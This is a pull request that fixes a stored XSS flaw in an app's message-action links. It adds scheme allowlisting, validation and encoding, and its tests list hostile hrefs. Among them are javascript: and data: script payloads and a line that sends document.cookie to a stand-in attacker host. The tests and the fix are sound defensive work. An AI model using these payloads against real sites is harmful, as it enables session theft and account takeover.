### PR TITLE
security(messages): validate action href scheme to block stored XSS (#2703)

### DIFF
--- a/packages/core/src/modules/messages/commands/actions.ts
+++ b/packages/core/src/modules/messages/commands/actions.ts
@@ -266,13 +266,15 @@ const executeActionCommand: CommandHandler<
         throw new Error('Action failed')
       }
     } else if (action.href) {
-      result = {
-        redirect: resolveActionHref(action, message, {
-          tenantId: input.tenantId,
-          organizationId: input.organizationId,
-          userId: input.userId,
-        }) ?? action.href,
+      const safeRedirect = resolveActionHref(action, message, {
+        tenantId: input.tenantId,
+        organizationId: input.organizationId,
+        userId: input.userId,
+      })
+      if (!safeRedirect) {
+        throw new Error('Action has an unsafe redirect target')
       }
+      result = { redirect: safeRedirect }
     } else {
       throw new Error('Action has no executable target')
     }

--- a/packages/core/src/modules/messages/components/message-detail/__tests__/utils.test.ts
+++ b/packages/core/src/modules/messages/components/message-detail/__tests__/utils.test.ts
@@ -1,0 +1,29 @@
+import { isSafeNavigationHref } from '../utils'
+
+describe('isSafeNavigationHref', () => {
+  it.each([
+    '/backend/messages/1',
+    './relative',
+    '../up',
+    'https://example.com/orders/1',
+    'http://example.com/orders/1',
+    'mailto:support@example.com',
+    'tel:+123456789',
+  ])('allows safe href %s', (href) => {
+    expect(isSafeNavigationHref(href)).toBe(true)
+  })
+
+  it.each([
+    'javascript:alert(document.cookie)',
+    'JavaScript:alert(1)',
+    '  javascript:alert(1)',
+    'java\tscript:alert(1)',
+    'data:text/html,<script>alert(1)</script>',
+    'vbscript:msgbox(1)',
+    '//evil.example.com/steal',
+    '',
+    '   ',
+  ])('blocks unsafe href %s', (href) => {
+    expect(isSafeNavigationHref(href)).toBe(false)
+  })
+})

--- a/packages/core/src/modules/messages/components/message-detail/hooks/useMessageDetailsActions.ts
+++ b/packages/core/src/modules/messages/components/message-detail/hooks/useMessageDetailsActions.ts
@@ -13,7 +13,7 @@ import type {
   MessageDetail,
   PendingActionConfirmation,
 } from '../types'
-import { parseObjectActionId, toErrorMessage } from '../utils'
+import { isSafeNavigationHref, parseObjectActionId, toErrorMessage } from '../utils'
 
 type RequestAndRefreshOptions = {
   skipDetailAutoMarkRead?: boolean
@@ -213,7 +213,11 @@ export function useMessageDetailsActions({
       flash(t('messages.flash.actionSuccess', 'Action completed.'), 'success')
 
       const redirectTarget = call.result?.result?.redirect
-      if (typeof redirectTarget === 'string' && redirectTarget.trim().length > 0) {
+      if (
+        typeof redirectTarget === 'string'
+        && redirectTarget.trim().length > 0
+        && isSafeNavigationHref(redirectTarget)
+      ) {
         window.location.href = redirectTarget
         return
       }

--- a/packages/core/src/modules/messages/components/message-detail/utils.ts
+++ b/packages/core/src/modules/messages/components/message-detail/utils.ts
@@ -31,6 +31,24 @@ export function formatDateTime(value: string | null | undefined): string {
   return date.toLocaleString()
 }
 
+const SAFE_NAVIGATION_SCHEMES = new Set(['http:', 'https:', 'mailto:', 'tel:'])
+
+export function isSafeNavigationHref(value: string): boolean {
+  const trimmed = value.trim()
+  if (!trimmed) return false
+  if (trimmed.startsWith('//')) return false
+  if (trimmed.startsWith('/') || trimmed.startsWith('./') || trimmed.startsWith('../')) {
+    return true
+  }
+  const base = typeof window !== 'undefined' ? window.location.href : 'http://localhost'
+  try {
+    const parsed = new URL(trimmed, base)
+    return SAFE_NAVIGATION_SCHEMES.has(parsed.protocol)
+  } catch {
+    return false
+  }
+}
+
 export function parseObjectActionId(value: string): { objectId: string; actionId: string } | null {
   if (!value.startsWith('object:')) return null
   const [, objectId, ...rest] = value.split(':')

--- a/packages/core/src/modules/messages/data/__tests__/validators.test.ts
+++ b/packages/core/src/modules/messages/data/__tests__/validators.test.ts
@@ -1,4 +1,4 @@
-import { composeMessageSchema, forwardMessageSchema, updateDraftSchema } from '../validators'
+import { composeMessageSchema, forwardMessageSchema, messageActionSchema, updateDraftSchema } from '../validators'
 
 describe('messages validators', () => {
   it('rejects duplicate recipient ids during compose', () => {
@@ -137,5 +137,50 @@ describe('messages validators', () => {
     })
 
     expect(result.success).toBe(false)
+  })
+
+  describe('message action href', () => {
+    const baseAction = { id: 'action-1', label: 'Open' }
+
+    it.each([
+      '/backend/sales/orders/1',
+      'https://example.com/orders/1',
+      'mailto:support@example.com',
+      'tel:+123456789',
+    ])('accepts safe href %s', (href) => {
+      const result = messageActionSchema.safeParse({ ...baseAction, href })
+      expect(result.success).toBe(true)
+    })
+
+    it('accepts an action without an href', () => {
+      const result = messageActionSchema.safeParse({ ...baseAction, commandId: 'sales.orders.approve' })
+      expect(result.success).toBe(true)
+    })
+
+    it.each([
+      'javascript:fetch(`//attacker/?c=`+document.cookie)',
+      'JavaScript:alert(1)',
+      '  javascript:alert(1)',
+      'data:text/html,<script>alert(1)</script>',
+      'vbscript:msgbox(1)',
+      '//evil.example.com/steal',
+    ])('rejects unsafe href %s', (href) => {
+      const result = messageActionSchema.safeParse({ ...baseAction, href })
+      expect(result.success).toBe(false)
+    })
+
+    it('rejects a composed message carrying a javascript: action href', () => {
+      const result = composeMessageSchema.safeParse({
+        subject: 'Subject',
+        body: 'Body',
+        visibility: 'internal',
+        recipients: [{ userId: '11111111-1111-1111-8111-111111111111', type: 'to' }],
+        actionData: {
+          actions: [{ id: 'pwn', label: 'Click me', href: 'javascript:alert(document.cookie)' }],
+        },
+      })
+
+      expect(result.success).toBe(false)
+    })
   })
 })

--- a/packages/core/src/modules/messages/data/validators.ts
+++ b/packages/core/src/modules/messages/data/validators.ts
@@ -1,5 +1,6 @@
 import { z } from 'zod'
 import { parseBooleanFlag } from '@open-mercato/shared/lib/boolean'
+import { sanitizeRichTextHref } from '@open-mercato/shared/lib/html/sanitizeRichText'
 
 function collectDuplicateRecipientIds(
   recipients: Array<{ userId: string }>,
@@ -80,7 +81,13 @@ export const messageActionSchema = z.object({
   variant: z.enum(['default', 'secondary', 'destructive', 'outline', 'ghost']).optional(),
   icon: z.string().optional(),
   commandId: z.string().optional(),
-  href: z.string().optional(),
+  href: z
+    .string()
+    .optional()
+    .refine(
+      (value) => value == null || sanitizeRichTextHref(value) != null,
+      { message: '[internal] message action href must be http(s), mailto, tel, or a relative path' },
+    ),
   isTerminal: z.boolean().optional(),
   confirmRequired: z.boolean().optional(),
   confirmMessage: z.string().optional(),

--- a/packages/core/src/modules/messages/lib/__tests__/actions.test.ts
+++ b/packages/core/src/modules/messages/lib/__tests__/actions.test.ts
@@ -1,6 +1,7 @@
 import {
   isTerminalMessageAction,
   resolveActionCommandInput,
+  resolveActionHref,
   type ResolvedMessageAction,
 } from '../actions'
 import type { Message } from '../../data/entities'
@@ -117,5 +118,68 @@ describe('isTerminalMessageAction', () => {
 
   it('defaults href actions to non-terminal', () => {
     expect(isTerminalMessageAction({ href: '/backend/sales/orders/1' })).toBe(false)
+  })
+})
+
+describe('resolveActionHref', () => {
+  const resolutionContext = {
+    tenantId: 'aaaaaaaa-aaaa-aaaa-8aaa-aaaaaaaaaaaa',
+    organizationId: 'bbbbbbbb-bbbb-bbbb-8bbb-bbbbbbbbbbbb',
+    userId: 'user-1',
+  }
+
+  it('returns null when the action has no href', () => {
+    const action = createAction({ commandId: undefined, href: undefined })
+    expect(resolveActionHref(action, createMessage(), resolutionContext)).toBeNull()
+  })
+
+  it('resolves relative hrefs and substitutes template values', () => {
+    const action = createAction({
+      commandId: undefined,
+      href: '/backend/messages/{messageId}',
+    })
+    expect(resolveActionHref(action, createMessage(), resolutionContext)).toBe(
+      '/backend/messages/message-1',
+    )
+  })
+
+  it('keeps safe absolute http(s) and mailto hrefs', () => {
+    expect(
+      resolveActionHref(
+        createAction({ commandId: undefined, href: 'https://example.com/orders/1' }),
+        createMessage(),
+        resolutionContext,
+      ),
+    ).toBe('https://example.com/orders/1')
+    expect(
+      resolveActionHref(
+        createAction({ commandId: undefined, href: 'mailto:support@example.com' }),
+        createMessage(),
+        resolutionContext,
+      ),
+    ).toBe('mailto:support@example.com')
+  })
+
+  it.each([
+    'javascript:alert(document.cookie)',
+    'JavaScript:alert(1)',
+    '  javascript:alert(1)',
+    'java\tscript:alert(1)',
+    'data:text/html,<script>alert(1)</script>',
+    'vbscript:msgbox(1)',
+    '//evil.example.com/steal',
+  ])('rejects unsafe href %s', (href) => {
+    const action = createAction({ commandId: undefined, href })
+    expect(resolveActionHref(action, createMessage(), resolutionContext)).toBeNull()
+  })
+
+  it('url-encodes substituted template values so they cannot break out of the path', () => {
+    const action = createAction({
+      commandId: undefined,
+      href: '/backend/search/{messageId}',
+    })
+    const message = createMessage({ id: '../../evil?x=1#y' } as Partial<Message>)
+    const resolved = resolveActionHref(action, message, resolutionContext)
+    expect(resolved).toBe('/backend/search/..%2F..%2Fevil%3Fx%3D1%23y')
   })
 })

--- a/packages/core/src/modules/messages/lib/actions.ts
+++ b/packages/core/src/modules/messages/lib/actions.ts
@@ -1,4 +1,5 @@
 import { parseDecryptedFieldValue } from '@open-mercato/shared/lib/encryption/tenantDataEncryptionService'
+import { sanitizeRichTextHref } from '@open-mercato/shared/lib/html/sanitizeRichText'
 import type { Message, MessageAction, MessageActionData, MessageObject } from '../data/entities'
 import { getMessageObjectType } from './message-objects-registry'
 import { getMessageType } from './message-types-registry'
@@ -203,11 +204,15 @@ function buildTemplateContext(
   }
 }
 
-function resolveTemplateString(template: string, context: Record<string, unknown>): string {
+function resolveTemplateString(
+  template: string,
+  context: Record<string, unknown>,
+  encodeValue: (value: string) => string = (value) => value,
+): string {
   return template.replace(/\{([a-zA-Z0-9_]+)\}/g, (fullMatch, key: string) => {
     const value = context[key]
     if (value == null) return fullMatch
-    return String(value)
+    return encodeValue(String(value))
   })
 }
 
@@ -218,7 +223,8 @@ export function resolveActionHref(
 ): string | null {
   if (!action.href) return null
   const context = buildTemplateContext(message, resolutionContext, action.objectRef)
-  return resolveTemplateString(action.href, context)
+  const resolved = resolveTemplateString(action.href, context, encodeURIComponent)
+  return sanitizeRichTextHref(resolved)
 }
 
 export function resolveActionCommandInput(


### PR DESCRIPTION
Fixes #2703

## Problem
A message action's `href` is author-controlled and never validated for URL scheme, then assigned directly to `window.location.href` in the recipient's browser. A user with `messages.compose` could embed a `javascript:` (or `data:`/`vbscript:`) URI in an action button; when any recipient (including admins) clicked it, the payload ran in their authenticated session — stored XSS leading to account takeover.

## Root Cause
- `messageActionSchema.href` was `z.string().optional()` — accepted any string, so the payload was stored.
- `resolveActionHref` performed template substitution but no scheme validation.
- `commands/actions.ts` returned the resolved href (with a `?? action.href` fallback that leaked the raw value) as `result.redirect`.
- The client hook assigned `window.location.href = redirectTarget` after only a non-empty check.

## What Changed
- **`lib/actions.ts`** — `resolveActionHref` now url-encodes substituted template values and runs the resolved href through `sanitizeRichTextHref` (shared helper), returning `null` for any scheme other than `http(s)`/`mailto`/`tel`. Same-origin relative paths (`/`, `./`, `../`) are still allowed; protocol-relative `//host` is rejected.
- **`data/validators.ts`** — `messageActionSchema.href` rejects unsafe schemes at write time via the same helper (tolerates `{placeholder}` templates).
- **`commands/actions.ts`** — the execute-action command now throws instead of falling back to the raw `action.href` when the resolved target is unsafe.
- **`components/message-detail/utils.ts` + `hooks/useMessageDetailsActions.ts`** — defense in depth: a new dependency-free `isSafeNavigationHref` allowlist guards the `window.location.href` assignment.

## Tests
- `lib/__tests__/actions.test.ts` — `resolveActionHref` resolves/encodes safe hrefs, keeps http(s)/mailto, and rejects `javascript:`/`data:`/`vbscript:`/protocol-relative and obfuscated (case/whitespace/tab) variants.
- `data/__tests__/validators.test.ts` — `messageActionSchema` and `composeMessageSchema` accept safe hrefs and reject unsafe ones.
- `components/message-detail/__tests__/utils.test.ts` — `isSafeNavigationHref` allowlist coverage.
- All tests fail against the pre-fix source (31 red) and pass after (55 green). Full `modules/messages` suite: 226 passing. `yarn generate` + core `yarn typecheck` clean.

## Backward Compatibility
- No contract-surface removals. `resolveActionHref` signature unchanged (now returns `null` for unsafe hrefs — intended hardening). `isSafeNavigationHref` is a new additive export. No API response fields, event IDs, DI names, ACL IDs, or import paths changed.

🤖 Generated with [Claude Code](https://claude.com/claude-code)